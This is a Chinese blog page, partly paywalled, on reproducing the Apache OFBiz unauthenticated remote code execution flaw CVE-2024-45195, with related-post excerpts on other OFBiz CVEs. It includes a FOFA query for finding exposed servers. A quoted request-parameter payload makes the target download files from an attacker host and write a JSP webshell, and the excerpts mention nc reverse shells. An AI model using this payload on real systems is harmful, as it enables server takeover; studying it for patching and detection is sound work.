Apache OFBiz 未授权远程代码执行漏洞(CVE-2024-45195)

最新推荐文章于 2025-10-28 10:00:00 发布
原创 最新推荐文章于 2025-10-28 10:00:00 发布 · 1.4k 阅读 · 5 GEO检测
标签
#apache

0x01 漏洞描述:

Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限

0x02 影响版本:

Apache OFBiz < 18.12.16

0x03 搜索语句:

FOFA:app="Apache_OFBiz"

0x04 漏洞复现:

在自己的vps上需要部署以下两个脚本用以远程执行

rceschema.xml

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <data-file name="rce" separat
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)
0xSec
09-06 1777
2024年9月,互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
Apache-OFBiz远程代码执行漏洞(CVE-2024-45195)
swordheart的博客
05-15 409
Apache OFBiz存在一个严重的远程代码执行漏洞CVE-2024-45195),该漏洞源于SSRF(服务器端请求伪造)问题,允许未经身份验证的远程攻击者通过控制请求来写入恶意文件。
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)并拿到shell
weixin_67840381的博客
09-12 1559
DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce。Host: 对方的host。这次使用的nc命令为。
CVE-2024-45195漏洞复现并反弹shell(Apache OFBiz 未授权远程代码执行漏洞
yyytaotao的博客
09-12 1636
本文利用了一个云服务器来远程代码执行并反弹shell.
Goby 漏洞发布|(CVE-2024-45195Apache OFBiz /viewdatafile 代码执行漏洞【已复现】
m0_46699477的博客
09-10 733
CVE-2024-45195:Apache OFBiz /viewdatafile 代码执行漏洞,Apache OFBiz是一个开源企业资源规划(ERP)系统。它提供了一套企业应用程序,集成并自动化企业的许多业务流程。 Apache OFBiz 存在远程代码执行漏洞远程攻击者可通过控制请求从而写入恶意文件获取服务器权限。
【春秋云境】CVE-2024-45195 Apache OFbiz未授权到RCE
最新发布
HMX404的博客
10-28 503
摘要: 本文介绍了Apache OFBiz系统的安全漏洞利用过程,针对未完全修复的身份验证绕过问题进行攻击。作者提供了详细的攻击步骤,包括使用605字符的webshell脚本和XML配置文件,通过viewdatafile接口将恶意文件写入系统。攻击成功后可在/webapp/accounting/shell.jsp路径执行任意命令。文章还提供了免费端口映射方案(FRP/cpolar)和XML配置解析说明,特别强调了length字段需要与webshell实际字符数严格匹配以避免上传失败。
apache
weixin_42330088的博客
10-24 1001
CVE-2024-38856可在unauth controller后跟一个视图来覆盖,修复是直接将Program Export加了权限,CVE-2024-45195是重新找了screen写文件。指向的TempExprScreens.xml看到,通过parameters参数传递tempExprDecoratorLocation作为location的值;指定url会继续被当作modelScreen解析,参照代码写法即可构造PoC,在代码中搜索"${groovy:相关代码,照着写即可。
漏洞复现-Apache OFBiz 未授权远程代码执行漏洞 (CVE-2023-49070)
玄道的网安博客
08-11 984
Apache XML-RPC 是 XML-RPC 的 Java 实现,XML-RPC 是一种使用 XML over HTTP 来实现远程过程调用的协议。USERNAME=&PASSWORD=s&requirePasswordChange=Y绕过针对/control/xmlrpc的接口过滤限制(CVE-2020-9496),从而使用 Apache XMLRPC 客户端库的应用程序权限执行任意代码。所以,只要我们在发送XML-RPC请求的时候,将。这个补丁的作用是为XML-RPC的接口增加鉴权。
漏洞复现】Apache OFBiz 授权不当致远程代码执行
今天是几号的博客
08-06 1939
攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台,提供全面的企业管理解决方案,包括电子商务、库存管理、制造、会计等功能,支持企业进行灵活的定制和扩展。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
Apache OFBiz XML-RPC远程代码执行漏洞(CVE-2023-49070)漏洞复现
qq_53733257的博客
12-11 2681
CVE-2023-49070 漏洞复现
超过2.2万个已删PyPI包竟存在被“复兴劫持”风险,供应链攻击新手段曝光!微软macOS应用惊爆八大漏洞,黑客可轻松获取无限制访问权限!| 安全周报0906
weixin_55163056的博客
09-06 2049
Apache OFBiz爆新漏洞远程代码执行威胁Linux与Windows安全;中国贸易公司遭新型跨平台恶意软件KTLVdoor猛烈攻击;Android用户务必立即安装最新安全补丁,堵截正在被黑客利用的漏洞;超过2.2万个已删PyPI包竟存在被“复兴劫持”风险
Apache OFBiz远程代码执行漏洞CVE-2023-51467)
Keepb1ue的博客
12-28 1264
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,存在漏洞可能导致不安全的代码执行,增加了系统安全性的风险。未授权访问和潜在的远程代码执行:此漏洞可能允许攻击者绕过安全限制,实现未授权访问和远程代码执行,严重时可能导致数据泄露、系统控制权被夺取。Apache官方已发布安全更新
Apache OFBiz路径遍历漏洞(CVE-2024-36104)
WuYSec的博客
06-05 1128
Apache OFBiz 18.12.14之前版本存在命令执行漏洞 ,该漏洞源于ControlFilter对路径限制不当导致用户能够访问ProgramExport导出功能执行Groovy代码。Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。
Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)
3tefanie的博客
12-29 1372
【身在井隅,心向璀璨】
漏洞预警 | Apache OFBiz 服务端模板注入漏洞CVE-2025-26865)
C20220511的博客
03-14 769
Apache OFBiz 是一个 开源的企业资源规划(ERP)系统 ,由 Apache 软件基金会维护。它旨在帮助企业整合和管理核心业务流程,支持从供应链管理、财务管理到客户服务的全方位业务需求。据描述,由于 Apache OFBiz 插件的特殊字段使用不当导致 freemarker 模板引擎注入,攻击者可以精心构造特殊请求,注入恶意的代码,导致任意代码执行,进而威胁整个服务器安全。近日,Apache OFBiz 发布更新修复 freemarker 模板注入漏洞CVE-2025-26865)。
Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496)漏洞
weixin_48413667的博客
09-10 1320
一、软件介绍 Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 二、漏洞描述 Apache OFBiz在17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞
漏洞复现】Apache-OFBiz xmlrpc远程代码执行漏洞CVE-2023-49070
失心少年
01-13 314
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Apache-OFBiz xmlrpc远程代码执行漏洞,Apache OFBizApache基金会的一套企业资源计划(ERP)系统。攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。
Apache 修复严重的 OFBiz 远程代码执行漏洞
smellycat000的专栏
09-06 529
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Apache 修复了 OFBiz 软件中的一个严重漏洞,可导致攻击者在易受攻击的 Linux 和 Windows 服务器上执行任意代码。OFBiz 是一款客户关系管理 (CRM) 和企业资源规划 (ERP) 商业应用套件,可被用于开发 web 应用的基于Java 的web 框架。该漏洞的编号是CVE-2024-45159,由 Rapid7 安全研...
Apache OFBiz RCE漏洞复现(CVE-2023-51467)
0xSec
12-28 2844
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行
【已复现】Apache OFBiz 远程代码执行漏洞(CVE-2023-51467)安全风险通告
smellycat000的专栏
01-03 1102
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache OFBiz 远程代码执行漏洞漏洞编号QVD-2023-48721,CVE-2023-51467公开时间2023-12-27影响对象数量级万级奇安信评级高危CVSS 3.1分数9.8威胁类型代码执行利用可能性高POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开危害描述:未授权的攻击者可以在目标服务器上执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值